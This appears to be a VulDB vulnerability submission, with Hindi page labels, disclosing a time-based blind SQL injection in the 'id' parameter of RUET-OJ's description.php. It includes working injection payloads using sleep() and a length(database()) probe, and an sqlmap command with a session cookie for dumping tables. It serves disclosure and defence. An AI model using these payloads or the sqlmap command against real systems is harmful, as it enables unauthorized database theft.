| शीर्षक | shawon100 RUET-OJ BETA 2016 Time Based Blind SQL Injection |
|---|
| विवरण | There is a Time Based Blind SQL Injection vulnerability in the "id" parameter of the description.php file, allowing an attacker to dump the entire database. You need to be authenticated in the application
[POC]
Use Burp proxy to verify the vulnerability.
GET description.php, passing the payload in the id parameter.
GET / description.php?id=id=55'+and+sleep(5)%23
To check the current database size, for example: id=55'+and+if(length(database())+=+3,sleep(5),0)%23
Automate with sqlmap:
sqlmap -u http://<IP>/description.php?id= --cookie=PHPSESSID=f1cc07f2b44446f48035e77e8184cec7 -D reg --tables
The person responsible for the application was informed via email on July 25, 2025. But I did not receive a response.
Link application: https://github.com/shawon100/RUET-OJ |
|---|
| उपयोगकर्ता | ManinhuGuitar (UID 84672) |
|---|
| सबमिशन | 13/10/2025 11:23 PM (6 महीनों पहले) |
|---|
| संयम | 27/10/2025 11:22 AM (14 days later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 330104 [shawon100 RUET OJ तक 18fa45b0a669fa1098a0b8fc629cf6856369d9a5 /description.php पहचान SQL इंजेक्शन] |
|---|
| अंक | 17 |
|---|